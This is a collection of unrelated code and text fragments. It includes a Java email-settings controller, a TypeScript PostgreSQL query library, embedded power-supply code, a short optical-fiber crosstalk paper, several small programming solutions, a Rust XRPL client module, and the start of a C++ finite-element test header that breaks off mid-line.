msgErr * email message content for unsuccessful status * @return redirects requests to GET /adminEmailSettings */ @RequestMapping(value = "/adminEmailSettings", method = RequestMethod.POST) public Object addEmailSettings(@RequestParam (required = false) boolean sendEmail, @RequestParam String userAuthentication, @RequestParam String userName, @RequestParam String pass, @RequestParam String host, @RequestParam String recipient, @RequestParam Integer port, @RequestParam String subject, @RequestParam String msg, @RequestParam String subjErr, @RequestParam String msgErr) { // does the processing this.emailSettingsService.addUpdateEmailSettings(sendEmail, userAuthentication, userName, pass, host, recipient, port, subject, msg, subjErr,msgErr); return "redirect:/adminEmailSettings"; } }
import * as _ from 'lodash' import * as T from './types' import * as Pg from 'pg' import * as P from './parser' import * as Util from './util' import * as Uuid from 'uuid' import { EventEmitter } from 'events' import * as E from './errors' import { parseSql } from 'tinypg-parser' import { createHash } from 'crypto' const PgFormat = require('@scaleleap/pg-format') const Debug = require('debug') const log = Debug('tinypg') interface TinyQuery extends Pg.Query { callback?(err: Error, result: any): void } export class TinyPg { public events: T.TinyPgEvents public pool: Pg.Pool public sql_db_calls: { [key: string]: DbCall } private hooks: T.TinyHooks[] private error_transformer: E.TinyPgErrorTransformer private sql_files: T.SqlFile[] private options: T.TinyPgOptions private transaction_id?: string constructor(options: T.TinyPgOptions) { options = _.isNil(options) ? {} : options this.events = new EventEmitter() this.error_transformer = _.isFunction(options.error_transformer) ? options.error_transformer : _.identity this.options = options this.hooks = _.isNil(this.options.hooks) ? [] : [this.options.hooks] const pool_options = _.isNil(options.pool_options) ? {} : options.pool_options const pool_config: Pg.PoolConfig & { log: any } = { connectionString: options.connection_string, keepAlive: pool_options.keep_alive, connectionTimeoutMillis: pool_options.connection_timeout_ms, idleTimeoutMillis: pool_options.idle_timeout_ms, application_name: pool_options.application_name, statement_timeout: pool_options.statement_timeout_ms, max: pool_options.max, min: pool_options.min, log: Debug('tinypg:pool'), } this.pool = new Pg.Pool(pool_config) this.pool.on('error', error => { log('Error with idle client in pool.', error) }) this.sql_files = P.parseFiles(_.compact(_.castArray(options.root_dir))) const db_calls = _.map(this.sql_files, sql_file => { return new DbCall({ name: sql_file.name, key: sql_file.key, text: sql_file.text, parameterized_query: sql_file.parsed.parameterized_sql, parameter_map: sql_file.parsed.mapping, prepared: _.defaultTo(options.use_prepared_statements, false), }) }) this.sql_db_calls = _.keyBy(db_calls, x => x.config.key!) } query<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(raw_sql: string, params?: P): Promise<T.Result<T>> { const query_id = Uuid.v4() const hook_lifecycle = this.makeHooksLifeCycle() const [new_query, new_params] = hook_lifecycle.preRawQuery({ query_id: query_id, transaction_id: this.transaction_id }, [raw_sql, params]).args return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => { const parsed = parseSql(raw_sql) const db_call = new DbCall({ name: 'raw_query', key: createHash('md5').update(parsed.parameterized_sql).digest('hex'), text: new_query, parameterized_query: parsed.parameterized_sql, parameter_map: parsed.mapping, prepared: false, }) return await this.performDbCall(db_call, hook_lifecycle, new_params, query_id) }) } sql<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(name: string, params?: P): Promise<T.Result<T>> { const query_id = Uuid.v4() const hook_lifecycle = this.makeHooksLifeCycle() const [, new_params] = hook_lifecycle.preSql({ query_id: query_id, transaction_id: this.transaction_id }, [name, params]).args return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => { log('sql', name) const db_call: DbCall = this.sql_db_calls[name] if (_.isNil(db_call)) { throw new Error(`Sql query with name [${name}] not found!`) } return this.performDbCall(db_call, hook_lifecycle, new_params, query_id) }) } transaction<T = any>(tx_fn: (db: TinyPg) => Promise<T>): Promise<T> { const transaction_id = Uuid.v4() const hook_lifecycle = this.makeHooksLifeCycle() hook_lifecycle.preTransaction(transaction_id) return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => { log('transaction') const tx_client = await this.getClient() const release_ref = tx_client.release tx_client.release = () => {} const release = () => { log('RELEASE transaction client') tx_client.release = release_ref tx_client.release() } try { log('BEGIN transaction') await tx_client.query('BEGIN') hook_lifecycle.onBegin(transaction_id) const tiny_tx: TinyPg = Object.create(this) tiny_tx.transaction_id = transaction_id const assertThennable = (tx_fn_result: any) => { if (_.isNil(tx_fn_result) || !_.isFunction(tx_fn_result.then)) { throw new Error('Expected thennable to be returned from transaction function.') } return tx_fn_result } tiny_tx.transaction = <T = any>(tx_fn: (db: TinyPg) => Promise<T>): Promise<T> => { log('inner transaction') return assertThennable(tx_fn(tiny_tx)) } tiny_tx.getClient = async () => { log('getClient (transaction)') return tx_client } const result = await assertThennable(tx_fn(tiny_tx)) log('COMMIT transaction') await tx_client.query('COMMIT') hook_lifecycle.onCommit(transaction_id) return result } catch (error) { log('ROLLBACK transaction') await tx_client.query('ROLLBACK') hook_lifecycle.onRollback(transaction_id, error) throw error } finally { release() } }) } withHooks(hooks: T.TinyHooks): TinyPg { const new_tiny = Object.create(this) as TinyPg new_tiny.hooks = [...new_tiny.hooks, hooks] return new_tiny } makeHooksLifeCycle(): Required<T.TinyHookLifecycle> { const hooks_to_run: T.HookSetWithContext[] = this.hooks.map(hook_set => { return { ctx: null, transaction_ctx: null, hook_set: hook_set } }) const preHook = ( fn_name: 'preSql' | 'preRawQuery', ctx: T.TinyCallContext, args: [string, T.TinyPgParams] ): T.HookResult<[string, T.TinyPgParams]> => { return hooks_to_run.reduce( (last_result, hook_set_with_ctx) => { const hook_fn: any = hook_set_with_ctx.hook_set[fn_name] if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) { return last_result } const [name_or_query, params] = last_result.args const result = hook_fn(ctx, name_or_query, params) hook_set_with_ctx.ctx = result.ctx return result }, { args: args, ctx: ctx } ) } const dbCallHook = ( fn_name: 'onSubmit' | 'onQuery' | 'onResult', query_context: T.QuerySubmitContext | T.QueryBeginContext | T.QueryCompleteContext ): void => { _.forEach(hooks_to_run, hook_set_with_ctx => { const hook_fn: any = hook_set_with_ctx.hook_set[fn_name] if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) { return } try { hook_set_with_ctx.ctx = hook_fn(hook_set_with_ctx.ctx, <any>query_context) } catch (error) { log(`${fn_name} hook error`, error) } }) } const transactionHook = ( fn_name: 'preTransaction' | 'onBegin' | 'onCommit' | 'onRollback', transaction_id: string, transaction_error?: Error ) => { _.forEach(hooks_to_run, hook_set_with_ctx => { const hook_fn: any = hook_set_with_ctx.hook_set[fn_name] if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) { return } try { hook_set_with_ctx.transaction_ctx = fn_name === 'preTransaction' ? hook_fn(transaction_id) : hook_fn(hook_set_with_ctx.transaction_ctx, transaction_id, transaction_error) } catch (error) { log(`${fn_name} hook error`, error) } }) } return { preSql: (ctx: T.TinyCallContext, args) => { return preHook('preSql', ctx, args) }, preRawQuery: (ctx: T.TinyCallContext, args) => { return preHook('preRawQuery', ctx, args) }, onSubmit: (query_submit_context: T.QuerySubmitContext) => { dbCallHook('onSubmit', query_submit_context) }, onQuery: (query_begin_context: T.QueryBeginContext) => { dbCallHook('onQuery', query_begin_context) }, onResult: (query_complete_context: T.QueryCompleteContext) => { dbCallHook('onResult', query_complete_context) }, preTransaction: (transaction_id: string) => { transactionHook('preTransaction', transaction_id) }, onBegin: (transaction_id: string) => { transactionHook('onBegin', transaction_id) }, onCommit: (transaction_id: string) => { transactionHook('onCommit', transaction_id) }, onRollback: (transaction_id: string, transaction_error: Error) => { transactionHook('onRollback', transaction_id, transaction_error) }, } } formattable(name: string): FormattableDbCall { const db_call: DbCall = this.sql_db_calls[name] if (_.isNil(db_call)) { throw new Error(`Sql query with name [${name}] not found!`) } return new FormattableDbCall(db_call, this) } isolatedEmitter(): T.Disposable & TinyPg { const new_event_emitter = new EventEmitter() const tiny_overrides: Partial<TinyPg> = { events: new_event_emitter } return _.create( TinyPg.prototype, _.extend<T.Disposable>( { dispose: () => { new_event_emitter.removeAllListeners() }, }, this, tiny_overrides ) ) } close(): Promise<void> { return this.pool.end() } getClient(): Promise<Pg.PoolClient> { log(`getClient [total=${this.pool.totalCount},waiting=${this.pool.waitingCount},idle=${this.pool.idleCount}]`) return this.pool.connect() } async performDbCall<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>( db_call: DbCall, hooks: Required<T.TinyHookLifecycle>, params?: P, query_id?: string ): Promise<T.Result<T>> { log('performDbCall', db_call.config.name) let call_completed = false let client: Pg.PoolClient const start_at = Date.now() const begin_context: T.QueryBeginContext = { id: _.isNil(query_id) ? Uuid.v4() : query_id, sql: db_call.config.parameterized_query, start: start_at, name: db_call.config.name, params: params, } let submit_context: T.QuerySubmitContext | null = null // Work around node-postgres swallowing queries after a connection error // https://github.com/brianc/node-postgres/issues/718 const connection_failed_promise = new Promise<void>((resolve, reject) => { const checkForConnection = () => { if (call_completed) { resolve() } else if (_.get(client, 'connection.stream.destroyed', false)) { reject(new Error('Connection terminated')) } else { setTimeout(checkForConnection, 500) } } setTimeout(checkForConnection, 500) }) const query_promise = async (): Promise<T.Result<T>> => { client = await this.getClient() let error: any = null try { hooks.onQuery(begin_context) this.events.emit('query', begin_context) log('executing', db_call.config.name) const values: any[] = _.map(db_call.config.parameter_map, m => { if (!_.has(params, m.name)) { throw new Error(`Missing expected key [${m.name}] on input parameters.`) } return _.get(params, m.name) }) const query: TinyQuery = db_call.config.prepared ? new Pg.Query({ name: db_call.prepared_name, text: db_call.config.parameterized_query, values: values, }) : new Pg.Query(db_call.config.parameterized_query, values) const original_submit = query.submit query.submit = (connection: any) => { const submitted_at = Date.now() submit_context = { ...begin_context, submit: submitted_at, wait_duration: submitted_at - begin_context.start } hooks.onSubmit(submit_context) this.events.emit('submit', submit_context) original_submit.call(query, connection) } const result = await new Promise<Pg.QueryResult>((resolve, reject) => { query.callback = (err: any, res: any) => (err ? reject(err) : resolve(res)) client.query(query) }) log('execute result', db_call.config.name) return { row_count: result.rowCount, rows: result.rows, command: result.command } } catch (e) { error = e throw e } finally { if (!_.isNil(error) && (!error['code'] || _.startsWith(error['code'], '57P'))) { client.release(error) } else { client.release() } } } const createCompleteContext = (error: any, data: T.Result<T> | null): T.QueryCompleteContext => { const end_at = Date.now() const query_duration = end_at - start_at const submit_timings = _.isNil(submit_context) ? { submit: undefined, wait_duration: query_duration, active_duration: 0, } : { submit: submit_context.submit, wait_duration: submit_context.wait_duration, active_duration: end_at - submit_context.submit, } return { ...begin_context, ...submit_timings, end: end_at, duration: query_duration, error: error, data: data, } } const emitQueryComplete = (complete_context: T.QueryCompleteContext) => { hooks.onResult(complete_context) this.events.emit('result', complete_context) } try { const data = await Promise.race([ connection_failed_promise.then(() => null), query_promise() ]) if (_.isNil(data)) { throw new E.TinyPgError("connection aborted") } emitQueryComplete(createCompleteContext(null, data)) return data } catch (e) { const tiny_stack = `[${db_call.config.name}]\n\n${db_call.config.text}\n\n${e.stack}` const complete_context = createCompleteContext(e, null) emitQueryComplete(complete_context) const tiny_error = new E.TinyPgError(`${e.message}`, tiny_stack, complete_context) throw this.error_transformer(tiny_error) } finally { call_completed = true } } } export class DbCall { config: T.DbCallConfig prepared_name?: string constructor(config: T.DbCallConfig) { this.config = config if (this.config.prepared) { const hash_code = Util.hashCode(config.parameterized_query).toString().replace('-', 'n') this.prepared_name = `${config.name}_${hash_code}`.substring(0, 63) } } } export class FormattableDbCall { private db: TinyPg private db_call: DbCall constructor(db_call: DbCall, tiny: TinyPg) { this.db = tiny this.db_call = db_call } format(...args: any[]): FormattableDbCall { const formatted_sql = PgFormat(this.db_call.config.text, ...args) const parsed = parseSql(formatted_sql) const new_db_call = new DbCall({ ...this.db_call.config, text: formatted_sql, parameterized_query: parsed.parameterized_sql, parameter_map: parsed.mapping, }) return new FormattableDbCall(new_db_call, this.db) } query<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(params?: P): Promise<T.Result<T>> { const hook_lifecycle = this.db.makeHooksLifeCycle() return this.db.performDbCall(this.db_call, hook_lifecycle, params) } }
def _fix_neg_log(self, path): paths = [] tail = path while tail: paths.append(tail) tail = tail.prev_path paths = paths[::-1] s = 1 max_step = False if max_step: s = max(s, len(paths) - 5) for i in range(s, len(paths)): cur_path = paths[i] prev_path = paths[i - 1] node = cur_path.nodes[-1] prob_idx = self.lattice_vocab[node.start_idx].index(node.word_idx) new_neg_log_prob = prev_path.neg_log_prob + -math.log(prev_path.transition_probs[0][prob_idx]) if cur_path.neg_log_prob != new_neg_log_prob: cur_path.neg_log_prob = new_neg_log_prob
/** * @brief Write secondary output voltage value to SMPS_settings instance * @details @todo opis jak ustawic napiecie **/ inline void smps_out_voltage_write(volatile struct SMPS_settings* smps_sets, const struct SMPS_PID_reg smps_pid, float vout){ if(vout > SMPS_OUT_VOLTAGE_MAX_F32) vout = SMPS_OUT_VOLTAGE_MAX_F32; else if(vout < SMPS_OUT_VOLTAGE_MIN_F32) vout = SMPS_OUT_VOLTAGE_MIN_F32; float out_power_max = smps_output_power_max_get(vout); float input_current_max = SMPS_OVERLOAD_COEFF_F32 * out_power_max * SMPS_TRANSFORMER_TURNS_RATIO_F32 /(vout * SMPS_EFFICIENCY_F32); float input_current = smps_sets->max_prim_current_f32; if(input_current > input_current_max){ } if((vout - smps_pid.voltage_ref_f32) > SMPS_SOFTSTART_VOLTAGE_DIFF_F32) smps_sets->soft_start = SMPS_SOFTSTART_UP; else if((vout - smps_pid.voltage_ref_f32) < -SMPS_SOFTSTART_VOLTAGE_DIFF_F32) smps_sets->soft_start = SMPS_SOFTSTART_DOWN; else smps_sets->soft_start = 0; smps_sets->out_voltage_f32 = vout; }
<filename>src/config/constants.ts<gh_stars>0 // import { DATE_YEAR } from '@src/utils/date'; import { IS_DEVELOPMENT } from './settings'; export const DEBUG_MARKERS = IS_DEVELOPMENT ? { endColor: 'red', fontSize: '12px', startColor: 'green' } : undefined; export const CLIENT_ASSET_PATH = `https://s3-us-west-1.amazonaws.com/mattscholta`; export const CLIENT_CLOUDINARY = `https://res.cloudinary.com/mattscholta/image/upload`; export const SITE_AUTHOR = `<NAME>`; export const SITE_DESCRIPTION = `The online portfolio of <NAME>ta, a Software Engineer!`; export const SITE_EMAIL_ADDRESS = `<EMAIL>`; export const SITE_EMAIL_LINK = `mailto:${SITE_EMAIL_ADDRESS}`; export const SITE_FACEBOOK = 'https://www.facebook.com/barguide'; export const SITE_INSTAGRAM = 'https://www.instagram.com/barguide'; export const SITE_URL = 'https://mattscholta.com'; export const SITE_TITLE = `Matthew Scholta`; // export const SITE_TITLE = `Matthew Scholta | ${DATE_YEAR}`;
Inter-Core Crosstalk in Multicore Fibers: Impact on 56-Gbaud/{\lambda}/Core PAM-4 Transmission We experimentally demonstrate the impact of inter-core crosstalk in multicore fibers on 56Gbaud PAM-4 signal quality after 2.5-km transmission over a weakly-coupled and uncoupled sevencore fibers, revealing the crosstalk dependence on carrier central wavelength in range of 1540-1560 nm. Introduction The towering increase of traffic demand in datacenters imposes the need for solutions that, on one hand, are capable of scoping with the constantly growing bandwidth requirements 1 and, on other hand, are dealing the bandwidthdensity issues 2 . In this regard, a spatial division multiplexing (SDM) is proposed on top of highspeed and low-cost solutions of short-reach interfaces for addressing the bandwidth-density problem and for scalability improvements 2,3 . A SDM can be realized in a single fiber through a separation of either signal's modes, cores or combination of two. High spatial density leads to a potentially high number of parallel transmission lanes, but at the same time induces a strong coupling effect between the spatially-separated channels and, therefore, giving a penalty in terms of transmission performance. Weakly-coupled multicore fibers (MCF) is an option, in which a residual coupling effect is present, but it does not impose additional requirements on signal processing at the receiver 4 . Some of the previous works have been carried out modelling the time 5 and frequency 6 dependencies of the inter-core crosstalk in multicore fibers of different type and structural design. However, the experimental validation for high-speed data transmission (100-Gbps and beyond) has not been done yet. Such analyses would provide essential data for designing a MCF structure with pre-defined characteristics for data transmission. In this paper, for the first time to the best of our knowledge, we experimentally determine the impact that the time-and frequency dependent inter-core crosstalk in multicore fibers has on 56-Gbaud PAM-4 signals transmitted over 2.5-km fiber links for intra-datacenter networks, which use MCFs with similar geometrical design and fiber parameters (such as attenuation and dispersion) but different inter-core crosstalk. The statistical analysis is employed on more than 1 000 BER measurements to reveal the time-and frequency dependence, which may result in transmission penalty for a deployed link. Experimental setup and fibers The setup used for this purpose is illustrated in Fig. 1. To generate a PAM-4 signal, we used an b) a) ECL approach that could be described as "attenuatedelay-and-combine". At the transmitter, two electrical signals from a pulse pattern generator (PPG), representing a 2 15 -1 long pseudorandom binary sequence (PRBS15) at 56-Gbaud, are decorrelated and then passively combined into a single 56-Gbaud PAM-4 signal. This signal is amplified to drive a 40-GHz external Mach-Zehnder modulator (MZM) that is used to modulate optical carrier from an external cavity laser (ECL). Optical carrier's central wavelength is set to 1540 nm, 1552 nm and 1560 nm to cover a major part of the C-band. The modulated optical signal is then amplified by an Erbium doped fiber amplifier (EDFA) to compensate the losses that appear due to 1:8 signal splitting and decorrelation before the spatially distributed channels are coupled into the 2.5-km seven-core fiber via a fan-in device (FI). In this experiment, we used two different types of hexagonal multicore fibers: a weakly-coupled MCF (WCMCF) and uncoupled MCF (UCMCF). Their key-parameters are summarized in Tab. 1. After the transmission, the spatial channels are demultiplexed by a fan-out device (FO). Then the signals from each core are sent for a detection. The receiver part consists of an EDFA preamplifier, a wave-shaper, which functioned as an optical bandpass filter (OBPF) and a variable attenuator, a 40 GHz PIN photodiode, a 65 GHz electrical amplifier, and a digital storage oscilloscope (DSO, 33 GHz, 80 GSa/s). Finally, the captured traces of the sampled signals are processed offline with a digital signal processing (DSP) chain, consisting of a low-pass filter, a maximum variance timing recovery, a symbolspaced decision-feedback equalizer (DFE) with 43 feed-forward taps (FFT) and 12 feedback taps (FBT), and an error counter. Note that the DFE tap weights were obtained for each fiber, each core, and for each wavelength. Results and discussion This section includes experimental results showing how a bit-error-rate (BER) changes with a received optical power (ROP) along with the BER statistic for each core of the multicore fibers carrying different wavelengths centered to 1540 nm, 1552 nm or 1560 nm with ROPs at the photodetector adjusted to 0 dBm and -1 dBm, respectively. Figure 2 compares the BER curves for three configurations of the fiber-link: first, the 56-Gbaud PAM-4 signals are coupled only into the core 1 of the weakly-coupled multicore fiber while other cores are idle; second, signals are coupled into all cores of the uncoupled multicore fiber while the traces of the signals, which are received after transmission over the core 1, are captured by the DSO for further post-processing and a BER counting; third, an optical-back-to-back (OB2B). For each data point, five (5) traces are captured and analyzed. Figure 2 displays the mean BER values. It serves as a reference, proving that the difference between the BERs obtained for the WCMCF measurement and for the UCMCF (shown in Fig. 3), is mainly due to obviously higher inter-core crosstalk in the weakly-coupled multicore fiber. If this crosstalk is eliminated, the signal quality would be identical, indicating the similar properties of single core in both types of MCFs. In addition, Fig. 2 proves that the crosstalk levels in the uncoupled MCF are negligibly small to impact on signal quality in a short-reach fiberoptic links employing 56-Gbaud PAM-4 signaling. The BER curves obtained for the OB2B (Fig. 2) show that this experimental setup with its implementation suffers from the chirp-dispersion interaction in bandwidth-limited conditions imposed by the DSO bandwidth. These lead to BER improvement after transmission over the multicore fiber link compared to the OB2B transmission. Figure 3 illustrates data from 1 050 BER measurements that were performed to reveal the impact of the inter-core crosstalk between adjacent cores on 56-Gbaud PAM-4 transmission over the multicore fibers. These measurements were performed close to the sensitivity threshold of the PD for the hard-decision forward error correction (HD-FEC) of 3.8×10 -3 to ensure that a sufficient error statistic is accumulated for each captured trace. The results reveal several keyproperties of the inter-core crosstalk. First, it has a major impact on the received signal quality even after relatively short transmission (like 2.5km) over the weakly-coupled MCF. Second, this crosstalk is wavelength dependent, which means that its impact on signal quality is also wavelength depend. This is confirmed by the BER results. Third, the crosstalk dynamic in weakly-coupled MCF, which is theoretically described previously 5 , was observed during the measurements and are depicted by the error bars, which can substantially differ from the mean BER values averaged over the number of processed measurements. Concluding remarks The impact of inter-core crosstalk on a 56-Gbaud PAM-4 transmission over a seven-core fiber is experimentally demonstrated, showing the crosstalk's wavelength dependence as well as revealing its time-dependence in system implementation. The study was performed using a 2.5-km long weakly-coupled and uncoupled multicore fibers having -11 dB/100 km and -45 dB/100km crosstalk between adjacent cores, respectively. The BER results show that shorter wavelengths are more affected by this type of crosstalk in terms of average BER performance, while longer wavelengths have larger fluctuation range, which means that such system with WCMCF has obviously higher instability in time even in short reach systems.
/** * Parses {@code List<String> ingredientNames} into a {@code List<IngredientName>}. */ public static List<IngredientName> parseIngredientNames(List<String> ingredientNames) { requireNonNull(ingredientNames); return ingredientNames.stream().map(IngredientName::new).collect(Collectors.toList()); }
n = input() s = raw_input() out = [" "]*n if n%2 == 0: x = n/2-1 for i in xrange(0, n, 2): out[x] = s[i] x -= 1 x = n/2 for i in xrange(1, n, 2): out[x] = s[i] x += 1 else: x = n/2 for i in xrange(0, n, 2): out[x] = s[i] x += 1 x = n/2-1 for i in xrange(1, n, 2): out[x] = s[i] x -= 1 print "".join(out)
def convert_point_notation(tree: etree.Element): for coord in [c for c in tree.findall(".//{*}Coords") if not c.attrib.get("points")]: cc = [] for point in coord.find("./{*}Point"): cx = point.attrib["x"] cy = point.attrib["y"] coord.remove(point) cc.append(f"{cx},{cy}") coord.attrib["points"] = " ".join(cc)
<reponame>fossabot/jymfony declare namespace Jymfony.Component.Console.Output { export class ConsoleOutputInterface extends OutputInterface.definition { public static readonly definition: Newable<ConsoleOutputInterface>; /** * Output interface used for errors. */ public errorOutput: Jymfony.Component.Console.Output.OutputInterface; } }
// RandomID returns an 8 byte random string in hexadecimal. func RandomID() string { b := make([]byte, 8) n, _ := rand.Read(b) return fmt.Sprintf("%x", b[:n]) }
#include <bits/stdc++.h> #define FastIO ios::sync_with_stdio(0); cin.tie(0); cout.tie(0); using namespace std; typedef pair<int, int> pii; typedef pair<string, int> psi; typedef pair<long long, long long> pll; typedef pair<char, int> pci; typedef pair<int, char> pic; typedef long long ll; #define MX 1000000000 bool isSquare(int x) { int sr = sqrt(x); return (sr * sr == x); } void solve() { //will run n times int a; cin >> a; if(a%2 == 0 && isSquare(a/2)){ cout << "YES" << endl; } else if (a%4 == 0 && isSquare(a/4)){ cout << "YES" << endl; } else { cout << "NO" << endl; } } int main() { FastIO; //DONT DELETE int n; cin >> n; while (n--) { solve(); } return 0; }
<filename>xrpl_sdk_jsonrpc/src/api/account_lines.rs use crate::{client::RpcRequest, Client, Result}; use serde::{de::DeserializeOwned, Deserialize, Serialize}; #[derive(Default, Clone, Serialize)] pub struct AccountLinesParams { account: String, // #[serde(skip_serializing_if = "Option::is_none")] // ledger_hash: Option<String>, // #[serde(skip_serializing_if = "Option::is_none")] // ledger_index: Option<String>, // #[serde(skip_serializing_if = "Option::is_none")] // strict: Option<bool>, // TODO: add more parameters! } /// The account_lines method returns information about an account's trust lines, /// including balances in all non-XRP currencies and assets. All information /// retrieved is relative to a particular version of the ledger. /// /// https://xrpl.org/account_lines.html #[must_use = "Does nothing until you send or execute it"] #[derive(Default, Clone)] pub struct AccountLinesRequest { client: Client, params: AccountLinesParams, } impl AccountLinesRequest { pub async fn execute<T: DeserializeOwned>(self) -> Result<T> { let request = RpcRequest { method: "account_lines".to_string(), params: vec![self.params], }; self.client.send::<AccountLinesParams, T>(request).await } pub async fn send(self) -> Result<AccountLinesResponse> { self.execute().await } } // TODO: consider extracting as a type. #[derive(Debug, Serialize, Deserialize)] pub struct AccountLine { pub account: String, pub balance: String, pub currency: String, pub limit: String, pub limit_peer: String, pub no_ripple: bool, pub quality_in: u64, pub quality_out: u64, } #[derive(Debug, Deserialize)] pub struct AccountLinesResponse { pub lines: Vec<AccountLine>, } impl Client { pub fn account_lines(&self, account: &str) -> AccountLinesRequest { AccountLinesRequest { client: self.clone(), params: AccountLinesParams { account: account.to_string(), }, } } } #[cfg(test)] mod tests { use crate::client::Client; #[tokio::test] async fn account_lines_works() { let client = Client::default(); let resp = client .account_lines("r9cZA1mLK5R5Am25ArfXFmqgNwjZgnfk59") .send() .await; dbg!(&resp); // if let Ok(resp) = resp { // let order_book = resp.order_book; // assert_eq!(order_book.bid_queue().len() as u32, depth); // assert_eq!(order_book.ask_queue().len() as u32, depth); // } } }
// This file is part of the dune-gdt project: // https://github.com/dune-community/dune-gdt // Copyright 2010-2018 dune-gdt developers and contributors. All rights reserved. // License: Dual licensed as BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause) // or GPL-2.0+ (http://opensource.org/licenses/gpl-license) // with "runtime exception" (http://www.dune-project.org/license.html) // Authors: // <NAME> (2019) #ifndef DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH #define DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH #include <atomic> #include <cmath> #include <dune/xt/la/container.hh> #include <dune/xt/la/eigen-solver.hh> #include <dune/xt/la/matrix-inverter.hh> #include <dune/xt/grid/boundaryinfo/interfaces.hh> #include <dune/xt/grid/entity.hh> #include <dune/xt/grid/filters/intersection.hh> #include <dune/xt/grid/integrals.hh> #include <dune/xt/grid/layers.hh> #include <dune/xt/functions/derivatives.hh> #include <dune/xt/functions/interfaces/grid-function.hh> #include <dune/xt/functions/visualization.hh> #include <dune/gdt/functionals/vector-based.hh> #include <dune/gdt/local/functionals/integrals.hh> #include <dune/gdt/local/bilinear-forms/integrals.hh> #include <dune/gdt/local/integrands/laplace.hh> #include <dune/gdt/local/integrands/laplace-ipdg.hh> #include <dune/gdt/local/integrands/ipdg.hh> #include <dune/gdt/local/integrands/product.hh> #include <dune/gdt/local/integrands/conversion.hh> #include <dune/gdt/norms.hh> #include <dune/gdt/operators/constant.hh> #include <dune/gdt/operators/laplace-ipdg-flux-reconstruction.hh> #include <dune/gdt/operators/lincomb.hh> #include <dune/gdt/operators/matrix-based.hh> #include <dune/gdt/operators/oswald-interpolation.hh> #include <dune/gdt/spaces/l2/discontinuous-lagrange.hh> #include <dune/gdt/spaces/l2/finite-volume.hh> #include <dune/gdt/spaces/h1/continuous-lagrange.hh> #include <dune/gdt/spaces/hdiv/raviart-thomas.hh> #include "base.hh" namespace Dune { namespace GDT { namespace Test { /** * \todo Add treatment of nonzero Dirichlet boundary values * \todo Add treatment of Neumann boundary values */ template <class G, XT::LA::Backends la = XT::LA::Backends::istl_sparse> class StationaryDiffusionIpdgEocStudy : public StationaryEocStudy<typename XT::Grid::Layer<G, XT::Grid::Layers::leaf, XT::Grid::Backends::view>::type, 1, la> { protected: using BaseType = StationaryEocStudy<typename XT::Grid::Layer<G, XT::Grid::Layers::leaf, XT::Grid::Backends::view>::type, 1, la>; static constexpr size_t d = BaseType::d; using typename BaseType::DF; using typename BaseType::GP; using typename BaseType::GV; using typename BaseType::I; using typename BaseType::M; using typename BaseType::O; using typename BaseType::R; using typename BaseType::S; using typename BaseType::V; public: using typename BaseType::E; StationaryDiffusionIpdgEocStudy(const double& symmetry_prefactor, const double& inner_penalty, const double& dirichlet_penalty, const std::function<double(const I&)>& intersection_diameter = LocalIPDGIntegrands::internal::default_intersection_diameter<I>()) : BaseType() , space_type_("") , symmetry_prefactor_(symmetry_prefactor) , inner_penalty_(inner_penalty) , dirichlet_penalty_(dirichlet_penalty) , intersection_diameter_(intersection_diameter) {} protected: using FF = XT::Functions::GridFunctionInterface<E>; using FT = XT::Functions::GridFunctionInterface<E, d, d>; virtual const XT::Grid::BoundaryInfo<I>& boundary_info() const = 0; virtual const FT& diffusion() const = 0; virtual const FF& force() const = 0; virtual const FT& weight_function() const = 0; std::vector<std::string> norms() const override { auto nrms = BaseType::norms(); nrms.push_back("eta_NC"); nrms.push_back("eta_R"); nrms.push_back("eta_DF"); return nrms; } std::map<std::string, std::map<std::string, double>> compute(const size_t refinement_level, const std::vector<std::string>& actual_norms, const std::vector<std::pair<std::string, std::string>>& actual_estimates, const std::vector<std::string>& actual_quantities) override { auto& self = *this; // compute the quantities/norms/estimates we known about and remove them from the todos // store the data in current_data_, BaseType::compute will return that auto remaining_norms = actual_norms; auto remaining_estimates = actual_estimates; auto remaining_quantities = actual_quantities; if (self.current_refinement_ != refinement_level) self.discretization_info(refinement_level); DUNE_THROW_IF(!self.current_space_, InvalidStateException, ""); // compute current solution const auto& current_space = *self.current_space_; // visualize if (DXTC_TEST_CONFIG_GET("setup.visualize", false)) { const std::string prefix = XT::Common::Test::get_unique_test_name() + "_problem_"; const std::string postfix = "_ref_" + XT::Common::to_string(refinement_level); // XT::Functions::visualize(self.diffusion_factor(), current_space.grid_view(), prefix + "diffusion_factor" + // postfix); XT::Functions::visualize(self.diffusion(), current_space.grid_view(), prefix + "diffusion" + postfix); XT::Functions::visualize(self.force(), current_space.grid_view(), prefix + "force" + postfix); // XT::Functions::visualize(self.dirichlet(), current_space.grid_view(), prefix + "dirichlet" + postfix); // XT::Functions::visualize(self.neumann(), current_space.grid_view(), prefix + "neumann" + postfix); } Timer timer; const auto solution = make_discrete_function(current_space, self.solve(current_space)); // only set time if this did not happen in solve() if (self.current_data_["quantity"].count("time to solution (s)") == 0) self.current_data_["quantity"]["time to solution (s)"] = timer.elapsed(); for (auto norm_it = remaining_norms.begin(); norm_it != remaining_norms.end(); /*Do not increment here ...*/) { const auto norm_id = *norm_it; if (norm_id == "eta_NC") { norm_it = remaining_norms.erase(norm_it); // ... but rather here ... // compute estimate auto oswald_interpolation_operator = make_oswald_interpolation_operator<M>( current_space.grid_view(), current_space, current_space, boundary_info()); oswald_interpolation_operator.assemble(/*parallel=*/true); const auto h1_interpolation = oswald_interpolation_operator.apply(solution); self.current_data_["norm"][norm_id] = laplace_norm(current_space.grid_view(), /*weight=*/diffusion(), solution - h1_interpolation); } else if (norm_id == "eta_R") { norm_it = remaining_norms.erase(norm_it); // ... or here ... // compute estimate auto rt_space = make_raviart_thomas_space(current_space.grid_view(), current_space.max_polorder() - 1); auto reconstruction_op = 